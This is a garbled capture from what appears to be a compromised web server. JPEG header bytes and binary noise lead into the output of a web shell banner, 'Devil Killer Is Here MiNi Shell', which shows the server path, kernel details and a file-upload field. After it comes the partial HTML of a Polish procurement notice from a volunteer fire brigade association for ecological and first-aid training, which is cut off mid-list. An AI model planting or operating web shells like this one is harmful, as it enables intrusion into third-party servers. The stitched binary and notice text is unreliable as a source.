JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241009/0053909301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzenie szkoleń oraz zajęć praktycznych mających na celu podnoszenie świadomości ekologicznej ludności oraz wiedzy na temat działań związanych z ratowaniem życia ludzkiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ODDZIAŁ WOJEWÓDZKI ZWIĄZKU OCHOTNICZYCH STRAŻY POŻARNYCH RZECZYPOSPOLITEJ POLSKIEJ WOJEWÓDZTWA WIELKOPOLSKIEGO IM. GENERAŁA STANISŁAWA TACZAKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 639849634</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Cypriana Norwida 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">60-867</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@wgpr.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zosprp.poznan.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Oddział Wojewódzki Związku Ochotniczych Straży Pożarnych Rzeczypospolitej Polskiej Województwa Wielkopolskiego im. generała Stanisława Taczaka </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzenie szkoleń oraz zajęć praktycznych mających na celu podnoszenie świadomości ekologicznej ludności oraz wiedzy na temat działań związanych z ratowaniem życia ludzkiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b14979cd-3add-41e6-b292-cb7795991bc4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00539093</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Programu Regionalnego Fundusze Europejskie dla Wielkopolski 2021-2027, w ramach projektu o nazwie „Rozwój systemu ratowniczo-gaśniczego, w tym doposażenie w sprzęt 29 OSP odpowiedzialnych za prowadzenie akcji ratowniczych i usuwaniu skutków zjawisk katastrofalnych oraz podnoszenie świadomości ekologicznej ludności, z woj. Wielkopolskiego.” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://asystent.postepowania.pl/org/wgpr/org/zosprp/postepowania/1535 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://asystent.postepowania.pl/org/wgpr/org/zosprp/postepowania/1535</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu komunikacja, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w Ustawie, odbywa się przy użyciu środków komunikacji elektronicznej (za pomocą platformy „Asystent Postępowania”, dostępnej pod adresem https://postepowania.pl/ oraz poczty elektronicznej), przy czym ofertę można złożyć tylko za pomocą platformy „Asystent postępowania”. W celu zalogowania na platformie „Asystent Postępowania” należy albo wejść na stronę asystent.postepowania.pl albo przy wejściu na stronę postępowania.pl wybrać opcję zalogowania „Przygotowanie i prowadzenie postępowania”.<br/><br/>Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego<br/>musi posiadać konto na platformie „Asystent postępowania” oraz zaakceptować Regulamin korzystania ze wskazanej platformy. Instrukcja założenia konta dla Wykonawcy i złożenia oferty oraz wskazany Regulamin znajduje się pod adresem https://postepowania.pl/<br/><br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, wycofania oferty oraz do komunikacji wynosi 150 MB. Pozostałe wymogi techniczne wskazane są w Regulaminie dostępnym pod adresem https://postepowania.pl/<br/><br/>Za datę przekazania oferty w formie elektronicznej, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na platformie „Asystent postępowania”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>a)	Administratorem Pani/Pana danych osobowych jest Oddział Wojewódzki Związku Ochotniczych Straży Pożarnych Rzeczypospolitej Polskiej Województwa Wielkopolskiego im. Generała Stanisława Taczaka, e-mail: poznan@zosprp.pl<br/>b)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym <br/>z postępowaniem o udzielenie zamówienia publicznego pn. „Przeprowadzenie szkoleń oraz zajęć praktycznych dla odbiorców wskazanych przez Oddział Wojewódzki Związku Ochotniczych Straży Pożarnych Rzeczypospolitej Polskiej Województwa Wielkopolskiego im. generała Stanisława Taczaka mających na celu podnoszenie świadomości ekologicznej ludności oraz wiedzy na temat działań związanych z ratowaniem życia ludzkiego” prowadzonym w trybie podstawowym.<br/>c)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania.<br/>d)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem wynikającym z przepisów prawa.<br/>e)	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>f)	Dane osobowe są przechowywane przez okres niezbędny do realizacji celu, o którym mowa w pkt b) powyżej.<br/>g)	Posiada Pani/Pan:<br/>1.	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2.	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym <br/>z obowiązującymi przepisami oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>3.	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego).Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia. <br/>4.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">h)	Nie przysługuje Pani/Panu:<br/>1.	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>3.	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZOSPRP/05/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> DLA CZĘŚCI NR 1:<br/><br/>Przedmiotem zamówienia w ramach Części nr 1 jest przeprowadzenie praktycznych zajęć dla organizacji społecznych biorących udział w akcjach ratowniczych.<br/><br/>Zajęcia praktyczne w formie szkolenia przeprowadzone zostaną dla 50 osób z organizacji społecznych w 5 grupach szkoleniowych po 10 osób. <br/><br/>Każde szkolenie trwa 2 dni po 8 godzin szkoleniowych (1 godzina szkoleniowa = 45 min.), łącznie 16 godzin szkoleniowych, w okresie od 25.10.2024 roku do 20.12.2024 r.<br/><br/>Zajęcia odbywać będą się w wybranych dniach tygodnia tj. od poniedziałku do niedzieli, w godzinach dopołudniowych lub popołudniowo – wieczornych, w zależności od możliwości czasowych uczestników projektu. <br/><br/>W trakcie szkolenia zaplanowane są trzy przerwy: dwie przerwy 15 minutowe oraz jedna przerwa 30 minutowa.<br/>MIEJSCE REALIZACJI SZKOLENIA: <br/>Realizacja szkolenia odbędzie się w województwie wielkopolskim: na terenie 5 różnych powiatów (wybranych przez Wykonawcę w porozumieniu z Zamawiającym) z 25 powiatów objętych projektem, tj. chodzieski, czarnkowsko-trzcianecki, gnieźnieński, gostyński, grodziski, jarociński, kaliski, kępiński, kolski, koniński, kościański, leszczyński, międzychodzki, ostrowski, pilski, Poznań, rawicki, słupecki, szamotulski, średzki, turecki, wągrowiecki, wolsztyński, wrzesiński, złotowski.<br/><br/>PROGRAM SZKOLENIA:<br/>Zajęcia praktyczne - obejmuje tematykę z obszaru:<br/>•	rodzaje zjawisk pogodowych i ich rozpoznawanie;<br/>•	sposoby racjonalnego korzystania z zasobów środowiskowych;<br/>•	ochrony-GOZ;<br/>•	przeciwdziałanie skutkom zmian klimatycznych;<br/>•	źródła pozyskania informacji o możliwych zagrożeniach i katastrofach;<br/>•	informacje na temat systemu ratownictwa, w tym roli OSP i organizacji społecznych biorących udział w akcjach ratowniczych;<br/>•	6 modułów ratowniczych: RKO, AED, pediatryczny, krwotoki, pilna pomoc, stany nagłe.<br/><br/>Sale szkoleniowe zapewnia Wykonawca. Zamawiający wymaga przeprowadzenia szkoleń w formie stacjonarnej. Zamawiający nie dopuszcza możliwości realizacji usługi drogą elektroniczną, chyba, że zaistnieją obiektywne przeszkody w realizacji usługi w szczególności w postaci wprowadzenia ograniczeń administracyjnych.<br/>Wymagania co do sal, które zapewni Wykonawca:<br/>•	powierzchnia min. 40 m2 ;<br/>•	sala z wyposażeniem w nowoczesny sprzęt techniczny i audiowizualny: projektor multimedialny, laptop oraz ekran, flipchart, flamastry lub tablice tradycyjne, sala musi mieć dostęp do internetu bezprzewodowego;<br/>•	sala musi spełniać wymogi bezpieczeństwa, akustyczne, oświetleniowe, musi być ogrzewana (w okresie zimowym);<br/>•	sala musi mieć dostęp do światła dziennego z możliwością zaciemnienia sali do potrzeb prezentacji multimedialnych oraz możliwość zapewnienia oświetlenia sztucznego;<br/>•	sala musi posiadać zaplecze sanitarne;<br/>•	sala musi posiadać stoły i krzesła dla wszystkich uczestników szkolenia oraz dla trenerów;<br/>•	sala oraz budynek, w którym się znajduje, musi zapewniać dostęp dla osób z niepełnosprawnością ruchową tj. dostosowanie architektoniczne dla niepełnosprawnych oraz etykiety społeczne);<br/>•	wszystkie miejsca, w których będą odbywać się szkolenia będą odpowiednio oznakowane przez Wykonawcę (zgodnie z wymaganiami Zamawiającego);<br/>•	w każdym miejscu, w którym będzie odbywać się szkolenie zostanie zapewniony taki sam standard sal (nie gorszy).<br/><br/>CELEM SZKOLENIA JEST:<br/>Realizacja szkoleń przełoży się na wzrost wiedzy mieszkańców Województwa Wielkopolskiego z zakresu zmian klimatycznych i ich skutków, ekologicznego podejścia do otoczenia środowiskowego, udzielania pomocy ratowniczej, w szczególności w nagłych przypadkach pogodowych i katastrof, przyczyniając się do zwiększenia poziomu bezpieczeństw w wielkopolskich gminach. Ponadto pozwoli na zdobycie wiedzy - pozyskanie informacji o możliwych zagrożeniach i katastrofach, racjonalnego korzystania ze środowiska, informacje na temat systemu ratownictwa, w tym roli OSP i organizacji społecznych biorących udział w akcjach ratowniczych oraz nabędą kompetencje z kompetencji z 6 modułów ratowniczych: RKO, AED, pediatryczny, krwotoki, pilna pomoc, stany nagłe.<br/><br/>Wykonawca będzie zobowiązany do:<br/>•	Sporządzenia dokumentacji:<br/>o listy obecności,<br/>o dziennik zajęć,<br/>o	protokół z przeprowadzonych testów,<br/>•	przeprowadzenie testów wiedzy przed i po prowadzeniu szkoleń - badające stopień uzyskanej wiedzy i stopień przygotowania do świadczenia usług.<br/><br/>Podczas prowadzenia szkoleń Wykonawca zna i wykorzystuje różne metody dydaktyczne m.in. zastosuje metody wykładowo-warsztatowe, metody szkoleniowe z wykorzystaniem technik praktycznych, IT i audiowizualnych.<br/><br/>Wysokość wynagrodzenia Wykonawcy będzie uzależniona od faktycznej liczby przeprowadzonych godzin szkoleniowych.<br/><br/>Wstępny harmonogram realizacji szkoleń będzie ustalany z Wykonawcą najpóźniej w ciągu 7 dni od podpisania umowy<br/><br/>Szkolenia będą realizowane na podstawie przygotowanych przez Wykonawcę materiałów szkoleniowych. Materiały te muszą uwzględniać szczegółowy sposób prowadzenia szkoleń uwzględniając wymagania Zamawiającego i indywidualne potrzeby Uczestników projektu, programu, zawartości merytorycznej i sposobu prowadzenia.<br/><br/>Wykonawca na bieżąco będzie monitorować postępy w nauce. Wykonawca opracuje i przeprowadzi wśród Uczestników projektu test sprawdzający ich poziom wiedzy przed i po szkoleniach. Uczestnicy projektu otrzymają zaświadczenie o uczestnictwie w szkoleniu.<br/><br/>Wykonawca przekaże Zamawiającemu kompletną oryginalną dokumentację związaną z prowadzeniem szkolenia w terminie do 5 dni roboczych po zakończonym szkoleniu, a zeskanowane dokumenty na każde wezwanie Zamawiającego.<br/><br/>Wykonawca niezwłoczne przekazywać będzie w formie telefonicznej lub e-mail informacje o frekwencji uczestników na szkoleniu (w tym o absencji Uczestników projektu);<br/><br/>Wykonawca niezwłocznie udostępni do wglądu na żądanie Zamawiającego, Instytucji Zarządzającej oraz innym podmiotom uprawnionym do kontroli wszelkich dokumentów związanych z realizowanym szkoleniem.<br/><br/><br/>4.	Zakres materiałów powinien odpowiadać godzinom szkoleniowym danego szkolenia/zajęć praktycznych. Wykonawca zobowiązany będzie do oznaczenia wszystkich dokumentów / materiałów związanych z realizacją Projektu zgodnie z aktualnie obowiązującymi „Zasadami promocji i oznakowania projektów” w Programie Regionalnego Funduszu Europejskiego dla Wielkopolski 2021-2027 . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <p class="mb-0">55120000-7 - Usługi hotelarskie w zakresie spotkań i konferencji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kompetencje osoby wyznaczonej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia – ratowanie życia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia – prowadzenie szkoleń/kursów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Realizacja usługi w sposób przyjazny środowisku</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 6</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Realizacja usługi z uwzględnieniem aspektu społecznego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> DLA CZĘŚCI NR 2<br/><br/>Przedmiotem zamówienia w ramach Części nr 2 jest przeprowadzenie działań szkoleniowych prowadzonych przez organizacje społeczne w zakresie edukacji i wzorców zachowań w przypadku wystąpienia gwałtownych i katastrofalnych zjawisk pogodowych i ich skutków oraz ochrony środowiskowej oraz 6 modułów ratowniczych: RKO, AED, pediatryczny, krwotoki, pilna pomoc, stany nagłe.<br/><br/>Szkolenie zaplanowano na 8 godzin szkoleniowych (1 godzina szkoleniowa = 45 min.), rozłożonych na 2 dni, łącznie 16 godzin w każdej grupie w okresie od 25.10.2024 roku do 20.12.2024 r. Szkolenia zostaną przeprowadzone w 30 grupach po 10 osób. Szkolenia odbędą się łącznie dla 300 mieszkańców z 25 powiatów, 29 gmin projektowych województwa wielkopolskiego. , w których znajdują się OSP objęte niniejszym projektem, tj. chodzieski (OSP Szamocin), czarnkowsko-trzcianecki (OSP Wieleń), gnieźnieński (OSP Trzemeszno), gostyński (OSP Babkowice), grodziski (OSP Kamieniec), jarociński (OSP Jaraczewo), kaliski (OSP Blizanów, OSP Tłokinia Wielka), kępiński (OSP Słupia pod Kępnem), kolski (OSP Dąbie), koniński 